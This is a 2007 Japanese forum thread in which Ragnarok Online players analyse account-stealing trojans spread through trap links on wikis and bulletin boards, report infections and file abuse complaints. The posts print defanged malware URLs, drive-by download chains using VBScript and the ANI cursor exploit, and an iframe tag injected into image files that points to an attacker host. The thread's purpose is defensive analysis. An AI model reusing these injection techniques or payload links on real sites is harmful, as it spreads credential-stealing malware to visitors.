良い情報になるかわからないけど、福建省の奴等って

ttp://search.yahoo.co.jp/search?p=RagnarokOnline+wiki+2007%2F03%2F29&ei=UTF-8&meta=vc%3D&fl=0&pstart=1&fr=top_v2&b=31

こんな感じでYahooで検索してるっぽいね。

626 名前:(^ー^*)ノ〜さん :07/04/16 14:07 ID:eVLj2nEI0
もう1つおまけに
94.116.162.220.board.ly.fj.dynamic.163data.com.cn
こんなところからアクセスしてます。

board.ly.fj.dynamic.163data.com.cn で検索すると結構アクセス拒否にしてるようなところでてるんですね。

627 名前:(^ー^*)ノ〜さん :07/04/16 14:42 ID:b3AMl+zg0
罠ブログ
ttp://blog200■blog100■fc2■com/

そこで見つけたもの。
取りたてホヤホヤを書き込んだようですね。
www■extd-web■com/blog/
から以下がコールされる
www■blog-ekndesign■com/blog/see■exe

これはClamWinでも検知。
see■exe: Trojan.Spy-3651 FOUND

カスペでも検知。
see■exe - infected by Trojan-PSW.Win32.Maran.cj


登録情報、毎度おなじみの
Domain Name ..................... extd-web■com
Registrant Name ................. zhiqiang lin
Registrant Organization ......... zhiqiang lin
Registrant Address .............. fujian longyan
Registrant City ................. longyan
Registrant Province/State ....... fujian
Registrant Postal Code .......... 610000
Registrant Country Code ......... CN
Expiration Date ................. 2008-04-12 12:18:57

628 名前:(^ー^*)ノ〜さん :07/04/16 15:04 ID:KBmAc7cA0
AssassinTemplateでまたも周知の垢ハックURLががが。
対策を取らない正当な理由ってあるのでしょうか。

Top / スキル / 生産 / 料理
.[http://www■din-or■com/bbs 料理]

.[http://www■din-or■com/bbs 生産設備]

.[http://www■din-or■com/bbs 料理テクニック]

.[http://www■din-or■com/bbs 生産道具]

[http://www■din-or■com/bbs 料理レシピ]

.[http://www■din-or■com/bbs 中間素材]

.[http://www■din-or■com/bbs 肉料理]

.[http://www■din-or■com/bbs 魚介料理]

629 名前:(^ー^*)ノ〜さん :07/04/16 15:36 ID:KBi1wxlA0
RO関連のwikiより、まったく無関係なwikiで改変される方がこわいわ
レポートの題材探すだけで感染する時代って凄いな

630 名前:(^ー^*)ノ〜さん :07/04/16 15:42 ID:sOCsgXSf0
踏んだ瞬間avastさんが反応したけど、大丈夫だろうか・・・

【  アドレス   】 ttp://www■ragnarok-game■com/bbs/
【気付いた日時】 たった今。
【     OS    】 Windows2000 Professional (5.0 ビルド 2195)
【使用ブラウザ 】 IE6.0
【WindowsUpdateの有無】 4/10前後
【 アンチウイルスソフト 】 avast カスペルスキー
【その他のSecurty対策 】 AdAware
【 ウイルススキャン結果】 avast カスペルスキーにて 進行中
【スレログやテンプレを読んだか】 今から読みます。
【説明】
某DSソフト(テイルズシリーズ)の攻略Wikiのリンクの一部が改変されており
踏んでしまいました。ROとは無関係だったため油断しておりました。
WikiにはTOPにコメントをして注意喚起のみ行ってあります。

現在感染した可能性のあるPCを隔離してノートPCにて対策を講じております。
踏んだ瞬間にavastが反応したため隔離・削除だけはしてありますが危険でしょうか?

とりあえず過去ログの確認と対策をしてまいります;;

631 名前:(^ー^*)ノ〜さん :07/04/16 15:59 ID:+Mv9W6LP0
>628
>対策を取らない正当な理由ってあるのでしょうか。

罠アドレスは書き込み出来ない方がいいのは確かだが、その言い方はどうかと思うな。
Spam.phpやそれに相当する機能を実装して安全性を高めて欲しい、という要望を出せば
いいだけだと思うんだが。

アサテンプレって外部ページのクッションがあるし、全く対策がされてないわけじゃないし。


ところで「対策」という文字で思い出したが、編集用Wikiと閲覧用Wikiを分けてる所が
あるが、あれって垢ハク対策として有効なんだろうか?
操作ミスや出来心系の悪戯による改変を防ぐ、という意味はあるが、中華相手には
全く無意味な気がするんだけど。

632 名前:(^ー^*)ノ〜さん :07/04/16 16:04 ID:IktSJGTD0
● 怪しいアドレス?を踏んだ時用

【  アドレス   】 www■soultakerbbs■net/388465/
【気付いた日時】 4/16 15:00
【     OS    】 WindowsXP
【使用ブラウザ 】 IE6
【WindowsUpdateの有無】 自動アップデイトにしてます、一番最後はいつ頃かわかりません
【 アンチウイルスソフト 】 NortonInternetSecurity2006
【その他のSecurty対策 】 無
【 ウイルススキャン結果】 NortonInternetSecurityでは検出無
【スレログやテンプレを読んだか】 (今読んでます)
【説明】
(『怪しいアドレス』との判断した理由、症状を詳しく書く)
友人の名前でGのWIKIに投稿があり、何も考えずクリックしてしまいました。後にアドレスを
調べてみると、様々なサイトに同アドレスが貼り付けられていることからアカハックアドレス
ではないかと思いました。クリックしたときは、何も表示されなかったです。
無知だったため、そのアドレスを踏んだ直後に
『GungHo-IDパスワード』『アトラクションIDパスワード』をそのままPCを変えることなく
行ってしまいました。ROの課金は踏んだときも現在も切れている状態です。
このサイトがアカハックに関連のあるものだとした場合、今から私はどのような対策を
行えばよいでしょうか?どうぞよろしくお願いします

633 名前:(^ー^*)ノ〜さん :07/04/16 16:14 ID:mokvk4Oc0
>>631
閲覧用は、管理人しか変更できなくて、
編集用の変更点を管理人が確認して、閲覧用に反映とか?

634 名前:(^ー^*)ノ〜さん :07/04/16 16:37 ID:H+wYXYov0
>>632
>【  アドレス   】 www■soultakerbbs■net/388465/
今は気配無いけどどうもそれくさい感じ。ドメイン保持者も中華。
Created: 05-mar-2007
Registrant Name ................. lin zhiqiang
Registrant Organization ......... zhiqiang lin
Registrant Address .............. fujian longyan
Registrant City ................. longyan
Registrant Province/State ....... fujian
Registrant Postal Code .......... 364000
Registrant Country Code ......... CN

>【WindowsUpdateの有無】 自動アップデイトにしてます、一番最後はいつ頃かわかりません
今手動でUpdateを掛けてみて更新項目が無かったらパッチは当たっている物と推測。
比較的安心できる(完全ではないが)。

>ROの課金は踏んだときも現在も切れている状態です。
金払って中華が入ってアイテムをむしって行くとは思わないのでたぶん大丈夫かも。
恐らく垢が課金中の鴨がわんさか捕獲されているだろうから。勿論1dayで入ってきて
さらっていく可能性とかはある。

Norton以外のアンチウイルスソフトでチェックできればいいのだが、オンラインスキャンも
すすめ難いのでOSの入れなおしがベストだと言っておきます。その後Pass等の変更。

>>631
どっちかというと中の人が居ないWikispamer対策かと。Wikispamも中越地震のWikiで
見られた通り、Wiki活動を洒落にならないくらい阻害しますから。

635 名前:(^ー^*)ノ〜さん :07/04/16 16:37 ID:LPv/V11G0
編集用を登録制にする
編集用へはWiki内外どちらからもリンクを貼らない、検索ロボット対策をする、アドレスは画像で示す
反映の際に管理人がチェックする

分けることで追加できるオプションはこれぐらい。
基本的に検索してきてるはずなので、閲覧用しか検索できなければ多少は影響を抑えられる

636 名前:(^ー^*)ノ〜さん :07/04/16 16:49 ID:umE2d6Qe0
>>632
安全な環境(テンプレ参照)を作成し、パス変更。

しあkる後に垢ハックトロイの削除、もしくは、OS再インストール。

637 名前:(^ー^*)ノ〜さん :07/04/16 16:56 ID:H+wYXYov0
>>634追記
GoogleCacheで見たらもろアカハクSiteでした。

638 名前:(^ー^*)ノ〜さん :07/04/16 16:59 ID:+Mv9W6LP0
>632
以前、チケ切れにもかかわらず1Dayか何かを使われてハクられたという報告があった。
その後の報告が無かったためにネタかマジか判らないが、もし罠を踏んだ状態だとしたら
1Day使って入ってくる(=既にハクの被害に遭ってる)可能性は否定できない。

取りあえず安全な環境からPASS変更をした後、PCのウィルスチェック。
その後安全になったと自信が持てた段階で、ROにログインして被害の有無の確認。


>編集用・閲覧用Wikiの話
SageWikiとかがそれに当たるんだけど、編集用Wikiにはリンクどころかアドレス自体
記載されてないし、編集に関して特に制限は無いみたい。

管理人さんが確認して更新してるならそれでも問題ないだろうけど、もしリアルタイムで
更新されてたら、中華が手動でハクアドレスを貼り付けに来た場合、意味があるのかな?と
ちょっと疑問だった。

自動投稿の対策として行ってるってなら、納得。

639 名前:(^ー^*)ノ〜さん :07/04/16 19:53 ID:mao7+Ovc0
ついさっきログアウトした所
ROクライアントの隣にhunting〜〜〜〜というメモ帳らしきものがでていて
同時に消えるのを確認しました。
自分なりに検索などで調べてみたのですがめぼしい答えがみつかりませんでした。

中途半端な質問で申し訳ないのですがhunting〜〜というのはアサウントハックに
関係してる可能性は強いでしょうか?

640 名前:(^ー^*)ノ〜さん :07/04/16 19:57 ID:C7QTAEyQ0
>>639
自分はそういう話は聞いたことないが、かなり臭いと思う。

641 名前:(^ー^*)ノ〜さん :07/04/16 20:07 ID:mao7+Ovc0
>>640
でもおかしなアドレス踏んだ覚えないんですよねぇ(汗

642 名前:(^ー^*)ノ〜さん :07/04/16 20:10 ID:wPg/BxSW0
じゃー気にしないでROやればいいと思うよ

643 名前:(^ー^*)ノ〜さん :07/04/16 20:17 ID:umE2d6Qe0
アサ ウントじゃなくて、ハンターだと思うんだ…そろそろLiveROへ行こうか。

既知のものかどうかは知らないし、垢ハックではないかもしれないが、なんらかの良くないものだと思われる。
とにかくスキャンしとけ。

644 名前:(^ー^*)ノ〜さん :07/04/16 20:25 ID:fWFP1WbS0
何もする気が無いなら聞くなよ

645 名前:(^ー^*)ノ〜さん :07/04/16 21:47 ID:9te1UaDe0
>>639
スパイウェアやウィルスの全スキャンかけて何もなきゃとりあえずほっときゃいんじゃない。

646 名前:(^ー^*)ノ〜さん :07/04/16 22:23 ID:3ZXiyyQX0
心配ならOS再インスコした方がよくない?
ウィルスかも知れないし
あるいは、OSがバグって不安定のためにおこった現象かもしれないな

647 名前:(^ー^*)ノ〜さん :07/04/17 05:03 ID:HodMr0Nw0
ここで検索かけても見つからないのでご報告
2007/4/17(Tue)02:39 に  ODN のIPからBBSに書き込みがありました
内容は/whereからのコピペと思われるもの画像も拾いものかと思われます
httpをNGワードにしているので頭欠けの状態で書き込まれていました
cgiに見せかけてますが、実際にcgiの場合は 〜.cgi になるはず
ネット知識に自信がないので疑問符が多いですが
多重に仕掛けられた罠だと思います。
どなたか詳しい方確認をお願いしたいです。

www■jpxpie6-7net■com/web/read_cgi/

agues結果:China Beijing
        画面は真っ白

ソースチェッカー結果:
 cgi/index.htm に2つの0サイズframe
  ┃
  ┣ wz.htm なにもなし?
  ┗ wu.htm 更に2つの0サイズiframeタグ
      ┃
      ┣1.htm スクリプトで↓URLを開くようにしているんだと思う
      ┃    http://www■jpxpie6-7net■com/web/read_cgi/svchost■exe
      ┃    
      ┗2.htm DIVで CURSOL の指定が2つほど

648 名前:(^ー^*)ノ〜さん :07/04/17 05:38 ID:FBP/AqYB0
>>607参照
早速新ドメイン使い始めたようだな

649 名前:(^ー^*)ノ〜さん :07/04/17 05:51 ID:HodMr0Nw0
>648さん
おお!検索のかけ方が悪かったのかな
ありがとうございます。
ソースチェックでは赤文字でてなかったんで一瞬 あれ? と思ったんですが
やっぱ真っ黒ですよね。
書き込みがODNからなのが気になりますがIPだけでODNに報告とかって
意味ありますか?

650 名前:(^ー^*)ノ〜さん :07/04/17 06:02 ID:FBP/AqYB0
トロイを仕込んだサイトへの誘導を書き込まれた
で、IPとかをきちんと揃えてODNへ通報でいいと思う
たぶんODNのサイトに窓口があるはずだから探してみてくれ

あと「BBSに画像をアップされた」でいいんだよな?
画像を迂闊に開かない方がいいかも知れん、偽装ファイルの可能性が高い
偽装ファイルかどうか確認する方法はあるが、不慣れならログだけとって削除がいいな

651 名前:(^ー^*)ノ〜さん :07/04/17 07:04 ID:GKEN1oAm0
ODNはネカフェが結構多いので、返答に”不特定多数が利用する場所云々”が含まれていたら
そのホストを禁止にした方が早い。

ODN苦情先
abuse@odn.ad.jp

652 名前:(^ー^*)ノ〜さん :07/04/17 08:03 ID:HodMr0Nw0
ありがとうございます
先ほどODNへ苦情を送ってきました
後は返事街というところです。

653 名前:(^ー^*)ノ〜さん :07/04/17 08:22 ID:8PvAQQnM0
>>647
と同じ書き込みをうちのサイトでも確認、反射的に削除してしまったけど
うちも書き込み元がodnだった。jpドメインからの投稿をメインにすると面倒だなぁ…。

あとRO関連のサイトを5個程度持ってるんで、ある程度中華の流行みたいなのが
自サイトだけで追えるんだけど、ここ一週間程度音沙汰がない。
間隔あけて新方式を導入とかなのかもしれん。

====

書き込みホスト:ofsfb-21p4-127.ppp11.odn.ad.jp

3年ほどROをプレイしているが、今までちょくちょくBSで過剰精錬に挑戦して
たんだけど、どうも精錬する品によって精錬成功確立が違うような気がしてな
らない。俺の場合だとロンコの成功率が異常に高く、+7を連続4回成功させた
ことがある。しかし他のはいまいちで、シルクは10回くらい精錬して一度も+7
までにならなかった。まぁちょくちょく精錬する程度なので試行数が少ないか
らたまたまといったらそれまでなんだけど、BSになって武器研究10とった段階
でLvあげ止めてるので、BSのLvとかDexによって相性のいい精錬品があるんじゃ
ないかとか想像したりしてるんだが、他の人はどうなんだろと気になった。
詳しくはアルケミのテンプレを見ましょう。
http://www■jpxpie6-7net■com/web/read_cgi/
もし同じような傾向があれば教えて欲しいな。

654 名前:632 :07/04/17 08:24 ID:xH+3v6ax0
みなさん、親切に教えていただいてありがとうございました
アドレスを踏んだ直後に『GungHo-IDパスワード』『アトラクションIDパスワード』
を変更してしまいましたが、それ以降は再度のパスチェンジを含め、教えて
いただいた対策のうちOSの再インストール以外は行いました
これで被害に合わないと信じたいです。。。
万が一被害に合ってしまったときは、被害者を増やさないことに役立つかは
わかりませんが、できるだけ詳しく報告にきます

本当にありがとうございました

655 名前:(^ー^*)ノ〜さん :07/04/17 08:40 ID:GKEN1oAm0
>>653
そのホストをぐぐると
4月14日にも同じホストであちこちアカハク書き込みがあったみたいだから
常時接続環境もしくはネカフェPCでまず間違いなさそうだ。

656 名前:(^ー^*)ノ〜さん :07/04/17 08:59 ID:NjDMcpQI0
>>647
もう少し詳しく調べてみたけど、
【1.htm】VBScriptとActiveXコントロールにより、下記のEXEファイルをダウンロードし実行するというもの。
 http://www■jpxpie6-7net■com/web/read_cgi/svchost■exe
【2.htm】ANIカーソルの脆弱性(MS07-017)を利用するもの。まずANIファイルがダウンロードされる。
 http://www■jpxpie6-7net■com/web/read_cgi/z1■jpg
 http://www■jpxpie6-7net■com/web/read_cgi/z2■jpg
上記2つは拡張子はJPGですが、実体はANIファイルです。
そして、ANIファイルが開かれると、下記のEXEファイルがダウンロード、実行される。
 http://www■jpxpie6-7net■com/web/read_cgi/svchost■exe (←z1.jpg)
 http://www■jpxpie6-7net■com/web/read_cgi/svchost■exe (←z2.jpg)

ウイルス対策ソフトでは、z1.jpg, z2.jpg, svchost.exeはいずれも検出対象になります(検出できない場合もあります)。
VIRUSTOTALでの結果です。このリンクの賞味期限は数時間です。
ttp://www.virustotal.com/vt/en/resultadof?91b26e569e89f3f1672ac5c3132219d0 (svchost.exe)
ttp://www.virustotal.com/vt/en/resultadof?9114429a04cdc163ddff24b78576a36a (z1.jpg)
ttp://www.virustotal.com/vt/en/resultadof?59d1ff86e36f7aeebb805da85e92108d (z2.jpg)

上記svchost.exeはMaran系トロイのようです。(Windowsには同名の正常なファイルがいるので注意)

657 名前:(^ー^*)ノ〜さん :07/04/17 09:34 ID:T79riTlD0
>>616 のZalman、下にも一匹いた。
www■bdjyw■net/vip.htm
結論としてはASUSTeKに仕掛けられたのと同様のaniなんだけど、
Firefoxでソースを見るとちょっと面白い(IEでは見ないほうがいい)。

 以下興味ない人はスルーで。

文字コードがUS-ASCIIで化けてる。
US-ASCIIは7bit(0〜127)なんだけど、128を足して8bit(128〜255)にして
ソースの可読性を落とすと同時にフィルタリングの類のすり抜けを狙っている。
McAfeeは対応しているよと今月ブログに書いていたんだけど
( www.avertlabs.com/research/blog/?p=250 )、
去年中国のCoolDiyerというハッカーによってソース付きで公表されている
(Cを読める人は www●xdiyer●cn/?id=174 )。

IEは(少なくとも去年のIE7Beta2の段階では)最上位bitを落として
7bitとみなしてレンダリングした(Firefoxはシカトする)んだけど、
これはHTMLの規格としては(W3C的には)どうなってるんだろ?

このソースをいじれば逆変換も可能なので
検体提出マニアはどうぞ(無料のLSI-C86でコンパイル可)。

658 名前:(^ー^*)ノ〜さん :07/04/17 10:50 ID:GKEN1oAm0
>>657
そのドメイン自体が罠っぽい。
TOPページのにも罠入り画像が仕込まれ呼び出される。

www■bdjyw■net/images/logo■jpg

上のは単なる中継ファイルなのであらゆるもので検知しない。
10時20分頃のVIRUSTOTALで完全スルー。

その罠ファイル文末にこんな一文が含まれる、これはClamWin(ClamAV)でも検知できる。
lmydj■vip■5944■net/mm■htm

mm■htmのVIRUSTOTAL結果、明暗はっきり
ttp://www.virustotal.com/vt/en/resultadof?dde4e8cabc293e6e6b554e96945714e9


登録情報、前者だけ。
後者はどっかのサービス使ってるようだ。

Domain Name.......... bdjyw■net
Organisation Name.... jet
Organisation Address. nanning
Organisation Address.
Organisation Address. nanning (南寧市 広西チワン族自治区首府)
Organisation Address. 537000
Organisation Address. GX
Organisation Address. CN

659 名前:(^ー^*)ノ〜さん :07/04/17 11:17 ID:I9VZMJih0
>>649
真っ黒も真っ黒、〜ってパトレイバー劇場版の作中のセリフが思い浮かんだオレ中年。


jpドメインからのアクセスだと多少厄介ですね。
前にでた163data.com.cnもだけど、cha-cache1-1.cache.telstra.net ってところからもあった。

660 名前:(^ー^*)ノ〜さん :07/04/17 11:30 ID:GKEN1oAm0
>>659
telstra.netはいつもの連中がTEACUP爆撃とかで愛用してる国外プロキシ。
塞いでも問題ないと思う。

661 名前:(^ー^*)ノ〜さん :07/04/17 11:36 ID:I9VZMJih0
>>660
了解。
.htaccessで、.cnと、一部IP帯はふさいだけど、telstra.netも塞いでおくことにします。

662 名前:(^ー^*)ノ〜さん :07/04/17 11:38 ID:T79riTlD0
>>658
おー。トップまでは見てなかった。
そのjpgからmm.htmの発動はMS04-028(GDI+)かな。
ちょっといじってみま。

663 名前:(^ー^*)ノ〜さん :07/04/17 11:41 ID:15FtOVLW0
ofsfb-21p4-127.ppp11.odn.ad.jpはROM776さんの所のBBSにも
爆撃したようで、TOPに注意が出てた。

jpドメインからの罠書き込み増えた場合、どうしたものかねぇ?
ODNからのアクセス拒否とかは弊害大きいだろうし。

664 名前:(^ー^*)ノ〜さん :07/04/17 11:55 ID:T79riTlD0
>>658
スクリプト読むのが面倒なのでdocument.writeをwindow.alertに。
ttp://www.mmobbs.com/uploader/files/2490.png
123.exe を拾う模様…なんだけどさっぱり落ちてきませんわ
(32kbpsなAirEDGEじゃきついか)。

665 名前:(^ー^*)ノ〜さん :07/04/17 12:27 ID:PQrlDOhZ0
>>664
その画像のメッセージに入ってるのは
http://lmydj■vip■5944■net/123■exe だな。

NOD32だと、Win32/Hupigon トロイの亜種 と検知した。

666 名前:(^ー^*)ノ〜さん :07/04/17 12:39 ID:PQrlDOhZ0
>>664-665
カスペオンラインスキャンのファイルスキャンにかけてみた。
「You're clean!」と出て検知しない。

えーと、検体提出窓口どこだっけ…LiveROにリストあったな。ちょっと提出してくる。

667 名前:(^ー^*)ノ〜さん :07/04/17 12:52 ID:T79riTlD0
パス無しzipで newvirusあっとkaspersky.com に発射〜。
Dr.WEBのスキャナはスキャン後のフォームからそのまま発射できるんだよな…。

668 名前:(^ー^*)ノ〜さん :07/04/17 14:21 ID:PQrlDOhZ0
LiveROにあったアドレス全部に、>664の 123 exe と、>656の svchost exe を送ってみた。
もう反応が帰ってきたもの。(NOD32は最初から亜種として検知。特定名の返事はまだ)

svchost:
NOD32 -> Win32/PSW.Maran トロイ の亜種(zip圧縮すると、Win32/Bagle.gen.zip ワーム)
CA Security Advisor -> malware

123:
NOD32 -> Win32/Hupigon トロイ の亜種
Sophos Anti-Virus -> 新種のTroj/GrayBr-Gen

669 名前:(^ー^*)ノ〜さん :07/04/17 14:32 ID:PQrlDOhZ0
>656の svchost exe

カスペからの返答:(特定名:Trojan-PSW.Win32.Maran.cj 次回updateで対応)
New malicious software was found in the attached file.
Trojan-PSW.Win32.Maran.cj
It's detection will be included in the next update. Thank you for your help.

670 名前:(^ー^*)ノ〜さん :07/04/17 14:57 ID:PQrlDOhZ0
>664の 123 exe

カスペからの返答:(特定名:Backdoor.Win32.Hupigon.erf 次回updateで対応)

New malicious software was found in the attached file.
Backdoor.Win32.Hupigon.erf
It's detection will be included in the next update. Thank you for your help

671 名前:(^ー^*)ノ〜さん :07/04/17 14:57 ID:NjDMcpQI0
>>658,662
未知のJPEG脆弱性利用だとしたら、かなりやばい代物ですね。
2004年に問題になったMS04-028(JPEG脆弱性)だとすれば、
ウイルス対策ソフトにまったく引っかからないというのが気になりますし。
(ちなみに最近問題のANIファイルはかなり高い確率で検出できます)

ちょっとカラクリをまとめておきますが、問題のURL(http://www■bdjyw■net/)
をソースチェッカーで調べると、HTMLソース中に次のタグを発見。
<img src="images/logo.jpg" width="186" height="64">

このJPEGファイル(http://www■bdjyw■net/images/logo■jpg)をダウンロードし、
バイナリエディタで開くと、ファイルの最後に次のテキストが埋め込まれています。
<iframe src=http://lmydj■vip.5944■net/mm■htm width=0 height=0></iframe>

ANIファイルと異なる点は、HTMLタグが埋め込まれているという点です。
(ANIファイルはEXEファイルへのURLが埋め込まれます)

672 名前:(^ー^*)ノ〜さん :07/04/17 15:04 ID:GKEN1oAm0
>>671
改めて調べなおすとwww■bdjyw■net/images/以下の画像ファイル全部に同じ罠があるよ。
つまりTOPにアクセスして出てくる画像リンク全部ってこと。
直にアクセスしたらこれでもかと言わんばかりに罠を仕込まれちゃう。
これは危険ドメイン以外の何者でも無い。

673 名前:(^ー^*)ノ〜さん :07/04/17 15:14 ID:T79riTlD0
やっと123.exe落とせた〜! VirusTotalに投げたら半数以上が検知。
Microsoftですら検知しているのにNorton・McAfee・Kasperskyが見逃すという珍品でした。
おそらくバックドア、その意味ではBitDefenderは少し怪しい。
で、中身を見たらなんじゃこりゃ…。わけわからん。踏んだら駆除できる自信がない。

674 名前:653 :07/04/17 15:36 ID:jpsfXa1o0
つい1時間前ぐらいにまたodnキタワー。
ofsfb-21p4-127.ppp11.odn.ad.jp

物理的にどこなんだろね。国内だし警察に通報とかできねーかな。

675 名前:(^ー^*)ノ〜さん :07/04/17 15:42 ID:T79riTlD0
ODNに通報でいいと思う。

676 名前:(^ー^*)ノ〜さん :07/04/17 16:17 ID:T79riTlD0
あー、これMS04-028とかそんな高度な話しじゃないや。
jpgだけじゃなくgifにも、動くわけがないcssにもiframeが追記されてる。
全ファイル(IIS5のpublic内だけ?)に追記するプログラム(件の123かも)を
サーバで踏んだ(adminで踏ませた)んだ。
HTTPで飛んでくる物には漏れなくiframeが付いているので
踏むと危険なことには変わりないけど、0-dayとかじゃないや。

677 名前:(^ー^*)ノ〜さん :07/04/17 17:08 ID:WBv85Lzg0
当方管理サイトにも着弾を確認。
2度ほど挑戦をしてきて両者とも弾いてるのだが、Accept-Languageを
変えてきてるんだよね(zh-cn → ja)。ブラウザ名も多少変えてきているから
日本語が分かる奴なのかも知れず。エラー画面をもう少し不親切にするか。

ODNへ通報完了。只、こっちが把握しているODNの通報先はnet-abuse@〜
なんだけどabuse@のほうが良かったっけ?

678 名前:(^ー^*)ノ〜さん :07/04/17 17:37 ID:GKEN1oAm0
>>677
abuseのほうが担当に直接連絡がつくと言う点で良いかもね。
担当者のアドもabuse@odnだしね。

件のものの情報だとこんな具合。
Contact Information: [担当者情報]
d. [電子メイル] abuse@odn.ad.jp
f. [組織名] 日本テレコム株式会社
g. [Organization] JAPAN TELECOM CO.,LTD.

679 名前:(^ー^*)ノ〜さん :07/04/17 18:50 ID:nADxNDSt0
ODNから返信あり
悪質な書き込みと認識するので該当するIPのユーザーに
注意をしてくれるとのこと、その際にBBSのURLや書き込み内容などを
知らせることになるがいいか?という確認メールが来てた
対応は早い

ところで画像に何かうめこまれてるとかっていうのは
画像をメモとかで開けばわかるのかな?

680 名前:(^ー^*)ノ〜さん :07/04/17 19:17 ID:gpFBX71l0
>>647,653で報告されいるものと同じですが、Eir板にも新スレを作って
罠書き込みがされていました。

-----------------------------------------------------------------
カンニングだって一種の勉強

1 :きまぐれ:2007/04/17(火) 02:43:47 ID:uWIKomt20
やる事成す事変わらない
カンニングだって一種の勉強

セージになったものの、相変わらず時計↑2でマジ狩りの日々が続いています。

未だAGIが少ないので木琴装備でもflee150という体たらく。まともに避けられ

るmobは明らかに格下なのでAGI、fleeともども170を越えるくらいまではこの生

活が続きそうです。

転職し、レベルが上がってもAGIを上げているためマジ狩りにさしたる変化は全

く無く、強くなっているのかどうかわからない状況が続いています。恐らく70

〜80代でFCASを挫折すると言うのはこの辺りが原因なのでしょう。私も心が折

れそうですし。とは言え、ようやくカビに対して避け始めているので少しずつ

ですが効果は見え始めているのかなと思います。まあ、まだLPとってないです

し来週までにはLP取得まで持っていきたいと思います。
http://www■jpxpie6-7net■com/web/read_cgi/
-----------------------------------------------------------------

4月2日にも新スレを作って罠書き込みがされている(>>380)のですが、Eir板管理人様の
削除報告によると「FKCfb-05p1-194.ppp11.odn.ad.jp」から書き込まれたもののようです。

681 名前:(^ー^*)ノ〜さん :07/04/17 19:59 ID:GKEN1oAm0
>>680
TEACUP爆撃では結構前から確認されていたが、いよいよかね。
FKCfb-05p1-194.ppp11.odn.ad.jp 福岡のもの。

ぐぐると幾つか4月2、3日辺りの爆撃痕があるね。
これも常時接続かネカフェあるいはゾンビか。

682 名前:(^ー^*)ノ〜さん :07/04/17 22:14 ID:GVUF+O8A0
RBOWikiにて偽装?されてたの踏んだ可能性が・・・ ↓は踏んだ部分のソースです。
<dd><a href="http://www■blog-livedoor■net/game/" rel="nofollow">http://www13.plala.or.jp/french/</a></dd></dl>
【  アドレス   】http://www■blog-livedoor■net/game/
【気付いた日時】 4/17 12時頃
【     OS    】 WindowsXP Home Edition
【使用ブラウザ 】 IE
【WindowsUpdateの有無】 自動更新(2日前程)
【 アンチウイルスソフト 】 ウィルスバスター2005(1週間ほど前に更新)
【その他のSecurty対策 】 Spybot S&D、Ad-awareSE(両者とも更新時期から開きあり)
【 ウイルススキャン結果】 (ウィルスバスター 見つからず セーフモードでAd-aware 見つからず)
【スレログやテンプレを読んだか】 (今から)
【説明】飛ぼうとしてクリックしたところ見た目真っ白なページ。
ブラウザの戻るクリックしても戻らず、連打しても戻らなかった為右上閉じるで終了
この間10秒ほど。飛んだ先のソース確認等はしてません。
別のPCからGID、アトID変更。
ウィルススキャンかけてバイトへ>帰宅後Ad-aware>別PCでカスペ落としてUSBにいれ
感染疑惑のPCにいれ、カスペ展開しようとしたところエラーメッセージ
Kaspersky6.0試用版[Vista対応]
ダウンロード位置\kis6jpvta.exe"読み込みエラー
WinSFX32M
インストールできませんでした。
と表示されます。次に何をすべきかご教授お願いしますorz

683 名前:(^ー^*)ノ〜さん :07/04/17 22:18 ID:qwAKabNZ0
>>653
そのホストは、かなり昔から荒らしに使われてるので永久にアク禁お勧め

684 名前:(^ー^*)ノ〜さん :07/04/17 22:34 ID:FBP/AqYB0
とりあえず2行目の . の置換し忘れどうにかしようぜ

685 名前:682 :07/04/17 22:48 ID:GVUF+O8A0
Σ 置換忘れ部分はフランスパン公式サイトアドです。
余計なトコでお騒がせしました。orz

686 名前:(^ー^*)ノ〜さん :07/04/17 23:00 ID:PQrlDOhZ0
>>682
カスペ落とすのは、そのPCでも構わない。落としなおせ。

687 名前:682 :07/04/17 23:06 ID:GVUF+O8A0
細かいトコで消費してすいませんが一応確認させてください;;
感染疑惑のPCをネットに繋いでカスペ落とせばいいんですかね?

688 名前:(^ー^*)ノ〜さん :07/04/17 23:10 ID:WBv85Lzg0
ROやブラウザで公式を見ない限りは大丈夫かもしれない。
しかし、既に取得された情報やRO以外の個人情報を送信される
可能性も否定できない為、『感染を疑うPCをネットワークに繋ぐ事』は
自己責任というしか。

689 名前:(^ー^*)ノ〜さん :07/04/17 23:23 ID:PQrlDOhZ0
取り敢えず、NOD32で検出できたので、カスペが駄目なら、NOD32を試してみてもいいかも。

−−−調査サイト−−−
http://www■blog-livedoor■net/game/
(Wikiのリストをhostsに登録してあれば開けない)
-----
開くと、次のページを開こうとする。
wz■htm
wu■htm


-----
wu■htm
-----
次のページをiframeで開こうとする。
1■htm
2■htm

-----
wu■htm
-----
現時点では、なにもない。0Byteのファイル。後で何か置かれるかも。
view-sourece: では真っ白になるだけでページが存在しない時のエラーは出ない。

690 名前:(^ー^*)ノ〜さん :07/04/17 23:24 ID:PQrlDOhZ0
(続き)

-----
1■htm
-----
VBスクリプトで下記のファイルを入手し、実行させよとする模様。
NOD32 検出名:Win32/PSW.Maron トロイの亜種
http://www■blog-livedoor■net/game/svch■exe

-----
2■htm
-----
下記のスクリプトを読み込む。iframeはsrc="http://" で未完成。
http://www■blog-livedoor■net/game/muxiao■js

-----
http://www■blog-livedoor■net/game/muxiao■js
-----
カーソルとして、下記のファイルを表示させようとする。
NOD32:検出名 Win32/TrojanDownloader.Ani.Gen トロイの亜種
http://www■blog-livedoor■net/game/muxiao1■jpg
http://www■blog-livedoor■net/game/muxiao2■jpg

691 名前:(^ー^*)ノ〜さん :07/04/17 23:28 ID:PQrlDOhZ0
>>687
Yes。パスワード変更などの盗まれる可能性のある行為をしなければ良い。

カスペで該当ファイルを検知できるかどうかは、カスペユーザーの報告がないと安心できないかも。
NOD32なら確定名ではなく亜種としてではあるものの、検知できるので、そっちでも良い。

踏んでしまった場合のテンプレに「hostsの書き換えは行なっているか」「該当アドレスはhostsに入っているか」の
確認も入れた方がいいような気がしてきた。hostsにあるから繋がらなくて真っ白なのか、踏んだ画面が真っ白なのか
区別が付かん。

692 名前:(^ー^*)ノ〜さん :07/04/17 23:41 ID:WBv85Lzg0
>>691
いや完全に解析済みのウイルスだと分かっているなら"Yes"で答えても
いいと思うが、そうでないなら断言はしないほうが良いと思うぞ。
私も多分大丈夫とは思うけど、"多分"では駄目なんだから。

693 名前:(^ー^*)ノ〜さん :07/04/18 00:16 ID:ytcE2Xhd0
>>692
それを言ったら、感染済みの状態でステルス化されずにインストールが可能かまで考慮しないといけない。
とりあえずは「現実的解決策」レベルで答えてみた。

他PCでダウンロードするのが最善なのは同意。

